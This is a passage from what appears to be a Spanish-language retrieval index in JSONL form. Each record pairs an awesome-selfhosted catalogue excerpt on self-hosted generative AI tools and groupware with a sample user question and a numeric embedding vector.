-0.09315, -0.00273, -0.00593, -0.05566, 0.0884, 0.0159, 0.05349, -0.10107, -0.02233, -0.01913, -0.06507, -0.02452, 0.12732, 0.0218, -0.00075, 0.00254, 0.04905, -0.02898, 0.05999, -0.02222, -0.02009, 0.01274, 0.006, -0.05235, 0.05746, 0.03926, -0.04725, -0.01714, -0.07559, 0.0433, -0.08475, 0.02966, -0.12597, -0.02051, 0.02915, -0.10574, 0.02534, -0.02752, -0.0652, -0.01874, 0.04206, 0.02334, 0.02584, -0.00254, 0.02474, -0.09613, -0.08123, 0.01032, -0.04685, -0.03344, -0.0437, -0.00281, -0.06505, -0.03383, 0.0101, 0.0391, -0.03688, 0.02791, 0.04229, -0.05961, 0.03377, 0.02851, 0.04721, 0.07517, -0.01802, 0.13283, -0.03082, -0.02857, -0.0479, 0.03032, -0.03589, -0.00412, -0.00423, 0.00076, -0.01085, 0.04386, 0.03169, -0.0439, 0.01085, 0.05404, 0.04472, -0.03726, 0.04171, -0.01881, 0.01598, -0.00443, -0.0342, 0.04049, 0.00054, 0.03758, 0.013, 0.0087, -0.0371, 0.03717, 0.05695, -0.05396, -0.03606, 0.00431, -0.08246, -0.16261, 0.03584, -0.03865, -0.04581, -0.05043, 0.08907, 0.0009, -0.03205, 0.02541, -0.03031]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "que programa puedo usar para ejecutar modelos de inteligencia artificial localmente", "v": [0.06988, 0.13228, -0.13715, -0.17864, 0.04965, -0.09905, -0.07248, -0.0391, -0.21414, 0.02088, -0.03738, -0.0423, -0.05072, 0.03142, 0.05606, -0.04907, 0.09289, -0.14767, -0.03934, -0.03672, 0.02271, -0.00956, -0.08448, -0.05784, 0.01739, 0.1287, -0.04632, 0.08549, -0.04045, -0.0581, -0.09678, -0.01365, 0.09592, -0.12152, -0.08934, -0.11382, -0.02144, 0.0557, 0.02606, 0.03346, 0.07306, 0.04953, -0.03933, 0.07138, 0.16837, 0.15214, 0.02173, -0.06697, -0.01403, 0.05456, -0.10934, 0.01614, 0.04851, -0.02362, 0.05191, -0.08803, 0.0847, -0.11589, -0.10165, -0.04438, -0.0513, -0.02385, -0.01968, 0.07034, 0.03725, 0.09757, 0.0077, -0.02282, -0.07761, -0.00586, 0.01511, -0.08387, 0.0471, 0.03109, 0.00039, 0.02115, -0.05863, -0.01389, 0.10851, -0.00696, -0.1355, -0.05926, -0.04525, 0.01757, 0.01734, -0.01008, 0.05505, -0.07939, 0.05623, -0.06473, -0.05664, 0.04857, 0.05893, 0.03612, 0.10457, 0.07431, 0.13455, -0.00616, 0.0065, 0.10822, 0.05055, -0.14831, -0.05741, 0.14314, -0.01814, 0.08169, 0.03929, 0.03693, -0.01092, -0.06324, -0.01468, 0.00104, -0.07897, -0.02478, -0.05575, 0.05059, 0.0614, 0.01051, 0.06909, -0.00348, -0.1023, 0.00042, -0.0027, -0.0683, 0.0452, -0.04485, -0.05285, 0.06524, -0.04666, -0.02166, -0.04543, -0.05209, 0.07545, -0.11336, -0.0252, 0.0263, 0.04366, -0.06552, -0.01448, -0.00974, 0.00464, 0.03582, -0.00135, -0.07744, -0.03945, -0.01759, 0.00706, -0.07263, 0.0637, 0.00071, 0.12642, 0.00055, -0.01273, 0.01511, -0.06137, -0.05028, 0.01197, -0.0276, 0.0038, 0.0461, -0.01799, 0.01577, -0.04606, 0.02729, 0.10399, -0.02438, 0.07004, 0.02542, 0.05147, 0.14034, 0.0258, 0.08523, 0.0208, -0.03894, 0.0273, 0.02038, -0.03391, 0.00274, 0.01756, -0.04697, -0.0776, 0.02617, 0.02463, -0.01305, 0.0199, -0.0424, -0.00844, -0.02085, 0.0079, 0.04107, -0.0608, 0.04083, 0.04506, 0.04555, 0.11812, 0.00069, 0.00128, 0.02121, -0.0305, -0.03679, -0.03879, 0.06042, -0.02506, -0.01978, -0.03041, 0.12873, 0.03095, 0.00468, -0.01207, 0.07813, -0.06837, -0.05868, 0.05909, -0.00596, 0.02319, -0.00843, -0.04616, -0.04461, 0.00242, -0.00988, -0.00907, -0.02367, 0.04429, 0.10707, -0.02439, -0.04575, 0.00759, 0.05139, -0.00127, -0.02833, -0.02045, 0.01076, 0.0135, -0.06814, -0.02663, -0.00137, -0.01522, 0.01801, -0.02272, -0.07795, -0.04922, 0.12113, -0.01137, -0.05197, -0.02871, -0.01616, -0.12528, -0.0395, 0.00665, -0.04221, -0.05639, 0.08571, 0.0671, -0.09344, 0.02151, 0.04376]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "cual es una alternativa gratuita a OpenAI o Claude que funcione en mi ordenador", "v": [-0.22145, 0.0603, 0.04611, -0.06614, 0.0277, -0.2039, 0.02361, 0.10067, -0.15306, -0.11685, -0.08165, -0.24261, -0.08522, -0.01922, 0.02494, -0.09062, 0.13527, -0.11492, 0.06996, 0.02145, -0.05457, -0.02811, -0.03919, -0.08487, 0.06459, 0.00935, -0.02793, -0.03455, -0.04541, -0.04528, 0.01244, -0.02286, 0.0608, -0.04118, 0.01212, -0.06385, -0.04776, -0.00855, 0.11458, 0.00512, 0.02007, -0.04202, 0.00229, 0.16884, 0.11401, -0.00654, -0.01056, 0.02001, 0.05171, 0.12364, -0.04523, -0.21552, -0.07031, -0.07615, 0.07342, 0.029, 0.12877, -0.04836, 0.01671, -0.06586, 0.00736, 0.10472, 0.02664, -0.02277, -0.03996, 0.00088, -0.01294, 0.03249, -0.07136, 0.15054, -0.08047, 0.00948, -0.07754, -0.07589, -0.09808, 0.09105, -0.05058, -0.04267, 0.11764, 0.04705, 0.07085, -0.01528, 0.06565, -0.06984, -0.09073, -0.02677, 0.01032, -0.07732, -0.02037, 0.04332, 0.01403, 0.08804, -0.0006, 0.21365, 0.05982, -0.04529, 0.11508, 0.11581, -0.0387, -0.00498, 0.108, -0.00473, -0.06898, 0.05728, -0.0638, 0.00946, 0.08353, 0.04063, -0.04321, 0.00434, 0.02077, -0.00261, 0.02393, -0.01112, -0.04791, -0.07107, -0.01141, -0.04883, -0.0106, 0.02166, -0.03888, 0.02282, -0.0415, -0.05331, -0.05745, 0.0115, 0.01352, 0.05521, -0.03326, 0.01243, 0.0062, 0.00353, -0.01916, -0.03649, -0.03621, -0.06821, 0.03887, -0.05327, 0.05585, -0.03514, 0.02315, 0.02328, -0.02347, -0.04935, -0.00526, 0.00535, 0.09665, -0.0586, -0.0726, -0.08231, 0.00524, 0.03049, 0.06863, 0.08248, -0.0085, 0.05602, -0.0198, 0.02757, -0.07357, 0.07107, -0.00059, -0.0095, 0.04171, 0.00742, -0.0217, -0.02419, -0.03414, -0.03366, -0.00642, 0.06461, -0.05927, 0.07158, -0.02427, -0.07494, 0.04231, -0.05005, 0.01659, 0.00418, 0.06418, -0.03969, -0.00244, 0.07477, -0.0067, 0.00202, -0.04989, -0.01912, -0.03128, 0.02985, -0.06872, -0.0502, 0.02285, 0.00117, -0.04954, -0.06665, -0.02639, -0.00924, -0.05512, -0.06371, -0.01316, 0.02295, -0.08609, -0.02231, -0.06475, -0.0179, 0.01406, 0.03578, 0.01418, -0.01642, -0.0453, 0.03687, -0.00735, 0.00291, 0.05683, 0.01577, -0.03624, -0.03147, -0.0115, -0.06807, 0.00108, -0.03211, 0.08337, 0.01245, 0.04411, 0.02241, 0.02476, -0.03426, 0.06384, 0.04277, 0.06113, -0.01334, 0.01919, -0.00323, 0.01966, 0.02347, -0.00824, -0.02266, -0.01477, 0.04432, -0.03621, 0.03354, 0.03621, 0.11573, 0.04889, -0.07345, -0.02427, -0.01813, -0.11189, -0.0311, -0.03344, -0.09945, -0.06327, 0.0458, -0.00441, 0.01929, -0.01574, 0.01577]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "con quΓ© herramienta puedo hacer investigaciΓ³n profunda usando mΓΊltiples fuentes sin necesidad de internet", "v": [-0.00805, 0.14984, -0.17394, -0.11088, 0.02061, -0.02559, -0.07051, -0.07964, -0.11839, -0.10998, 0.05809, 0.03795, -0.04044, -0.09899, 0.00518, -0.02326, 0.03074, -0.13306, 0.01597, -0.08939, -0.03044, -0.11801, -0.12654, -0.08417, -0.21442, -0.02876, -0.03632, -0.00014, -0.04592, 0.04378, -0.1168, 0.11364, 0.0375, 0.01762, -0.18645, -0.07126, -0.09938, 0.14249, -0.02817, -0.03349, -0.01432, 0.03427, -0.13194, 0.01785, 0.06545, 0.07287, -0.09543, -0.06839, -0.00686, 0.07687, -0.10351, -0.10831, -0.15933, -0.05619, -0.00825, -0.1112, 0.13841, -0.19109, 0.07291, -0.03063, -0.10411, -0.03138, -0.0205, -0.03179, 0.04984, -0.02729, 0.02088, -0.04735, -0.04287, 0.06719, -0.00537, -0.01156, 0.01433, -0.05033, 0.02673, 0.02106, 0.00278, 0.03435, 0.03278, 0.0353, -0.03203, 0.01326, -0.03386, -0.0318, -0.0818, -0.08599, 0.12193, -0.04984, -0.01204, -0.10376, -0.02974, 0.09415, -0.10561, 0.00743, 0.01378, -0.04017, 0.02884, -0.05396, 0.01179, -0.02641, 0.09064, -0.00332, -0.1252, 0.0863, -0.04035, -0.00694, 0.00829, -0.06394, -0.08907, -0.03484, 0.05125, 0.02232, -0.01022, -0.06046, -0.02432, 0.03995, 0.03536, -0.03679, -0.06608, -0.09045, 0.01136, 0.02588, -0.05979, -0.04591, 0.02345, -0.04043, -0.02955, 0.05985, 0.08602, -0.07976, 0.00351, -0.02389, -0.07062, -0.05791, 0.00622, -0.06832, 0.00866, -0.1542, 0.02309, -0.07517, 0.02067, -0.02439, -0.08788, -0.10089, 0.05826, -0.0078, 0.00611, -0.08316, -0.12923, -0.04141, -0.0384, -0.01199, -0.0466, 0.04347, -0.05666, 0.02066, -0.05128, -0.00817, -0.09816, 0.06512, -0.04684, -0.05559, 0.02402, 0.02442, 0.01944, -0.01653, -0.0334, 0.01091, 0.01082, 0.07084, -0.04337, -0.02045, -0.01843, -0.0623, -0.00979, -0.03919, -0.03601, -0.02745, 0.02372, -0.05932, -0.05964, -0.00229, -0.05902, -0.04839, -0.02626, -0.04627, 0.04801, -0.04994, -0.01895, 0.00562, -0.03308, 0.03299, -0.03009, 0.04365, 0.1116, -0.02652, 0.00134, -0.02041, 0.0654, -0.06578, -0.07636, 0.00173, -0.03456, -0.04641, 0.06696, 0.06202, -0.07065, -0.01242, -0.01908, 0.02863, -0.00295, -0.0535, 0.03528, -0.06934, -0.03141, -0.02214, -0.00884, -0.04554, -0.02209, 0.02498, -0.0003, -0.00302, 0.02293, 0.0284, 0.02523, 0.05888, 0.03496, -0.00958, 0.02086, -0.00351, 0.04846, 0.00225, -0.06924, -0.08635, 0.02288, -0.02701, 0.016, -0.00512, -0.07188, -0.00287, -0.02283, 0.03679, -0.0058, 0.00816, 0.01364, -0.08671, -0.0624, 0.00854, 0.01344, -0.07159, -0.03562, 0.03646, 0.03233, -0.05106, 0.06153, -0.01997]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "quΓ© interfaz grΓ‘fica hay para usar modelos de IA generativa desde mi ordenador?", "v": [-0.0528, 0.04561, -0.05555, -0.16284, 0.10484, -0.0976, -0.0781, -0.0018, -0.07096, -0.03183, -0.00614, -0.06326, -0.10088, 0.01109, 0.09244, -0.07191, 0.08019, -0.13137, 0.0123, -0.08138, 0.00824, 0.08415, -0.09328, -0.10182, -0.0884, 0.06127, -0.02993, -0.05855, -0.05836, -0.01206, -0.04781, -0.03767, 0.14271, -0.1153, -0.24241, -0.10588, 0.01199, -0.02665, 0.10647, -0.04486, 0.10736, 0.0274, -0.08491, 0.01456, 0.21863, 0.00916, -0.04534, -0.01279, -0.08905, 0.01808, -0.05941, -0.11932, 0.01536, 0.05026, -0.03528, -0.12606, 0.12246, -0.11767, 0.02627, -0.03688, -0.00259, 0.14904, -0.04792, 0.0233, -0.02265, -0.00696, -0.09047, -0.08299, -0.01845, 0.02127, 0.00892, 0.04853, 0.03265, -0.09287, 0.11628, 0.02047, -0.03541, -0.08772, 0.2133, 0.07824, 0.07621, -0.01055, -0.11587, -0.02829, -0.04162, -0.00819, 0.04283, 0.0001, 0.00844, -0.02889, -0.02189, 0.01797, -0.06288, -0.01299, 0.047, -0.0074, -0.01065, 0.07254, 0.06322, -0.02356, 0.01154, -0.06544, -0.05928, 0.12613, -0.03864, -0.01574, 0.0003, -0.0356, -0.05594, -0.03042, 0.1038, 0.0015, 0.0114, 0.02168, -0.0653, 0.03393, 0.11278, -0.0457, -0.07539, -0.07485, -0.00944, 0.04268, 0.05131, 0.02732, -0.03316, 0.00955, -0.00055, 0.09204, -0.05045, -0.02573, -0.07534, -0.08425, -0.00181, -0.1277, -0.08927, 0.02051, -0.04718, -0.07969, 0.04257, -0.07785, 0.05598, 0.09001, 0.02469, -0.03281, -0.04543, 0.06432, 0.07833, -0.06394, -0.07355, -0.03191, 0.07365, -0.04045, 0.03893, -0.04109, -0.01153, 0.02181, 0.00791, 0.04071, -0.01157, -0.03411, -0.06013, 0.05498, 0.0474, 0.02453, 0.03337, -0.0769, -0.09716, 0.02009, 0.03559, 0.06461, 0.01329, 0.04371, -0.00995, -0.0702, 0.09628, 0.00817, -0.05157, -0.00955, -0.05425, -0.003, -0.03264, 0.06786, -0.02881, 0.01698, -0.07484, -0.02883, 0.00968, 0.00898, 0.02506, 0.00375, -0.01516, 0.10779, 0.03051, 0.02075, 0.09662, -0.03225, 0.0047, 0.03061, 0.01681, -0.01938, -0.01617, 0.00504, -0.04959, -0.03994, 0.12273, 0.07079, -0.07285, 0.01735, 0.02557, 0.03703, -0.04175, 0.01807, 0.02588, -0.00174, -0.01962, -0.01408, 0.04946, -0.01231, 0.0515, -0.03768, 0.04457, -0.00586, -0.01724, 0.02657, -0.01453, -0.01626, -0.05034, 0.00083, 0.02007, -0.02488, 0.03894, 0.05045, 0.00135, -0.01474, -0.0726, -0.00057, 0.01055, -0.00699, -0.03774, -0.05511, 0.01947, 0.07374, -0.00414, -0.0268, -0.03202, -0.06421, -0.13014, 0.00408, -0.00608, -0.05176, -0.05732, 0.01803, 0.03473, -0.02711, 0.00542, 0.0407]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "con quΓ© puedo montar un motor de bΓΊsqueda basado en IA alternativo a Perplexity?", "v": [0.16626, 0.15237, -0.14989, 0.02315, -0.18058, 0.08635, 0.04296, -0.02364, -0.27911, -0.17326, 0.00857, 0.0095, 0.06672, 0.00979, 0.10983, -0.0099, -0.03405, -0.06468, 0.04066, -0.05432, 0.04407, -0.04969, -0.11996, -0.13033, 0.04903, 0.05289, -0.0721, 0.02735, -0.11512, -0.02886, -0.05283, 0.11509, 0.08222, 0.07069, -0.09733, -0.13298, 0.07127, 0.01496, 0.09606, -0.08896, -0.02745, -0.0111, -0.02869, -0.01395, -0.02077, 0.01323, -0.05753, -0.09709, -0.11047, 0.00016, 0.06424, -0.04163, -0.10569, 0.06149, 0.06732, -0.05545, 0.14434, -0.11284, 0.03442, -0.05318, -0.02226, 0.0625, -0.05171, 0.04784, -0.03063, -0.00206, -0.05449, 0.01456, -0.06261, -0.04044, -0.15666, -0.05776, -0.00349, -0.04981, -0.09568, 0.08004, 0.06015, -0.09263, 0.0504, 0.06327, 0.03939, -0.00032, -0.02126, 0.06428, -0.12687, 0.02079, 0.04062, -0.18191, 0.01717, -0.00899, 0.06635, -0.0099, 0.01411, 0.05859, -0.05231, 0.01992, -0.00878, 0.17135, -0.04895, 0.05959, 0.01817, 0.01984, -0.06487, 0.07831, 0.06076, 0.01545, 0.10956, 0.07553, 0.01876, -0.01098, 0.00736, -0.02527, -0.01772, 0.00264, -0.04646, -0.04602, -0.06293, 0.00036, -0.00302, -0.00967, -0.03514, 0.12172, 0.02369, 0.01247, 0.04364, -0.01815, 0.07706, 0.09705, 0.031, -0.02129, 0.06, 0.01357, -0.00119, -0.09532, 0.01971, 0.05611, 0.07634, 0.06086, 0.0483, 0.01432, 0.10624, -0.0034, 0.07192, -0.05627, 0.02611, 0.03179, 0.05796, -0.03727, -0.01863, -0.03323, -0.05761, -0.02329, 0.06861, 0.04377, -0.10046, -0.00466, 0.01074, 0.01585, 0.01967, 0.09596, -0.02043, 0.01331, -0.01629, -0.0429, -0.01878, 0.02173, -0.0415, -0.10796, -0.00921, -0.01063, -0.0313, 0.01183, 0.00284, -0.05562, 0.09309, 0.01102, -0.04785, -0.05583, 0.01281, 0.01034, -0.04032, -0.01388, -0.08226, 0.01768, -0.02126, -0.03003, 0.0697, -0.00176, 0.02297, -0.05478, 0.06716, -0.01007, -0.06538, -0.00652, 0.03672, 0.00302, -0.01909, 0.02533, 0.05628, 0.00538, -0.04664, 0.00811, -0.03565, -0.00918, 0.0141, -0.00806, -0.03669, 0.0348, -0.02623, 0.04584, 0.02113, -0.06715, 0.05076, -0.02495, -0.08026, -0.03536, 0.02335, -0.05378, -0.01623, 0.07462, -0.0008, 0.0003, 0.02043, 0.03738, -0.00746, 0.03901, 0.0067, 0.01012, 0.00841, 0.05367, 0.01761, 0.00276, -0.02446, 0.00287, 0.00568, 0.06502, 0.01236, 0.06146, -0.02092, 0.03607, 0.09304, 0.05916, 0.00665, -0.02324, 0.00498, -0.03537, -0.0552, 0.08973, 0.02949, -0.0372, -0.0754, 0.03272, -0.03823, -0.06697, 0.05592, -0.01661]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "existe alguna herramienta que funcione como Open-WebUI y soporte Ollama?", "v": [-0.13227, 0.0862, -0.20715, -0.06765, -0.01105, -0.15175, -0.07111, -0.09355, -0.06942, -0.11928, -0.13382, -0.16116, 0.09645, 0.01825, 0.02834, 0.00337, 0.11275, -0.18586, -0.10435, -0.05814, -0.1564, 0.09777, -0.11663, 0.01216, -0.02687, -0.02132, 0.04384, -0.09111, -0.13829, -0.05917, 0.04449, 0.0057, -0.03133, -0.0659, -0.08429, -0.01646, -0.13445, -0.04591, 0.09324, 0.04044, -0.02944, -0.0563, -0.0168, 0.17842, 0.03813, 0.1063, -0.03398, 0.06441, 0.05622, 0.03226, -0.05614, -0.21607, -0.10477, -0.07925, -0.01515, -0.04653, 0.21729, -0.12674, 0.08623, -0.06892, -0.07126, 0.01916, -0.04411, -0.1145, -0.0281, -0.02412, 0.00924, -0.01659, -0.06447, 0.09552, -0.04904, 0.05563, 0.01347, 0.02767, 0.01209, 0.05587, 0.00276, 0.0197, 0.01571, 0.06879, 0.0243, 0.04999, 0.02129, 0.01927, -0.08757, -0.05871, 0.03242, -0.03697, -0.09161, -0.09157, -0.04106, 0.04622, -0.05487, 0.0579, -0.00718, -0.09042, 0.01318, -0.05435, 0.0596, -0.04824, 0.09657, -0.03871, -0.08183, -0.05553, 0.01322, -0.00261, 0.09083, -0.06506, -0.05389, 0.0682, 0.08763, 0.0249, -0.04079, -0.01632, -0.00633, -3e-05, -0.06548, -0.05349, 0.02807, -0.06184, 0.02889, 0.01665, -0.0481, 0.00933, -0.02426, -0.00513, -0.06476, 0.10364, -0.00073, -0.12114, -0.00908, -0.0563, -0.04451, 0.01997, 0.03127, -0.00741, 0.044, 0.02303, 0.03225, -0.03445, 0.05518, -0.00548, -0.03906, -0.05412, 0.01053, -0.03414, 0.03821, 0.04632, -0.07913, -0.0447, -0.00862, 0.00915, 0.00102, 0.04632, -0.05769, -0.01678, -0.02946, 0.01833, -0.03611, 0.0561, -0.05261, -0.07237, 0.03309, 0.02393, -0.0648, 0.03676, -0.03084, 0.03373, 0.09936, 0.05389, 0.01247, 0.07937, 0.06034, -0.08763, -0.00196, -0.05544, -0.05671, -0.02039, 0.0713, -0.13256, -0.0111, 0.01215, 0.02389, -0.01169, -0.00915, 0.00089, -0.0186, -0.02435, -0.04605, -0.00927, 0.05854, 0.01324, -0.07865, -0.08719, 0.03727, 0.01607, -0.02466, -0.04831, 0.05896, 0.01293, -0.07315, -0.0388, 0.01211, -0.06885, -0.00753, 0.04238, -0.02289, -0.01979, 0.01372, 0.02444, 0.03413, -0.03285, 0.01547, -0.02144, 0.01512, 0.00635, 0.01498, 0.0113, -0.05067, -0.01429, 0.00609, 0.01411, 0.0459, 0.03579, 0.06478, 0.03257, 0.0374, -0.00021, 0.03429, -0.01344, 0.03123, -0.05071, -0.01258, -0.04577, 0.02407, -0.01357, 0.0209, -0.00476, -0.05272, 0.00091, 0.00389, 0.03443, 0.01905, -0.03179, -0.03461, -0.07159, -0.03739, -0.00876, -0.02309, -0.07793, -0.01992, 0.04892, 0.00346, -0.0441, 0.0089, -0.03103]} +{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "que software sirve para montar un grupo de trabajo completo con correo, calendario y notas?", "v": [-0.03648, 0.05253, -0.17948, -0.24773, -0.15737, -0.19521, 0.01042, 0.02312, -0.06546, -0.15164, -0.07173, -0.1016, 0.12531, -0.01461, 0.00989, 0.00579, 0.06967, -0.13672, 0.05093, 0.08966, -0.07695, -0.04439, -0.0465, -0.08319, -0.10655, -0.00704, 0.03728, -0.04677, -0.10084, 0.15931, 0.09062, -0.00554, 0.07427, -0.12348, 0.01649, -0.05538, 0.03282, -0.01845, -0.13682, -0.05441, -0.01355, 0.01563, -0.14865, 0.02508, 0.01373, -0.0443, 0.05412, 0.06031, -0.05471, 0.01548, 0.06771, 0.0016, 0.01084, -0.00599, -0.10828, -0.09741, 0.08869, -0.0036, 0.00479, -0.03598, -0.04747, 0.15347, -0.05556, -0.01896, 0.03713, 0.0312, 0.03037, -0.06926, -0.06028, 0.01839, -0.06156, -0.04271, 0.02937, -0.09385, -0.03281, -0.07237, -0.01545, 0.07611, -0.09137, 0.00329, 0.0274, 0.05073, -0.02531, 0.12613, -0.0381, -0.07831, 0.11754, -0.00198, -0.01077, 0.03351, 0.04585, 0.09341, -0.03097, 0.05765, 0.06083, 0.0198, 0.03587, 0.06875, 0.00506, 0.01599, 0.04218, -0.07036, 0.00738, 0.1132, -0.03341, 0.09046, 0.00122, 0.07677, 0.02787, 0.05577, -0.04311, -0.01235, -0.09219, 0.0221, -0.04567, -0.12054, 0.02125, 0.00665, 0.0133, -0.09203, 0.04518, 0.09038, -0.012, 0.02015, 0.03374, -0.05111, 0.13136, 0.09814, 0.01179, 0.06416, -0.08571, -0.01651, -0.12635, 0.03738, -0.04367, -0.0124, 0.00636, -0.01432, 0.05489, -0.0194, 0.01405, 0.06076, 0.02423, -0.02818, 0.07502, 0.06579, 0.02203, -0.05893, 0.0063, -0.01249, -0.02283, 0.07689, 0.02072, 0.0312, -0.08875, -0.072, 0.01498, 0.03464, 0.02856, -0.02387, -0.00085, 0.04041, -0.03411, 0.01978, -0.02265, -0.04101, -0.05717, -0.01556, 0.05885, 0.06167, -0.00889, 0.02641, 0.17467, -0.09101, 0.03921, -0.06236, 0.01323, 0.00526, -0.01144, 0.05811, -0.06175, 0.05711, 0.03927, 0.02994, -0.02632, 0.01624, 0.02755, 0.04522, 0.03712, 0.03716, -0.0289, 0.01488, 0.00033, -0.02439, 0.02356, -0.01404, -0.03572, -0.01547, -0.02168, -0.05849, 0.01973, -0.08567, -0.03771, 0.03419, 0.02533, 0.02771, -0.02995, 0.09773, 0.03967, 0.13087, 0.06365, -0.03281, 0.03132, 0.04939, -0.05467, -0.03261, 0.08069, 0.03267, 0.0184, 0.07914, -0.00376, 0.03706, 0.06422, -0.00197, -0.01467, 0.00313, 0.03086, -0.03588, 0.08742, 0.00475, 0.0158, 0.04919, -0.03146, -0.05045, 0.01437, 0.02313, 0.06245, 0.03978, -0.03252, -0.04742, 0.02483, 0.02767, 0.00384, -0.04672, -0.09851, -0.05475, -0.01739, 0.00787, -0.02385, 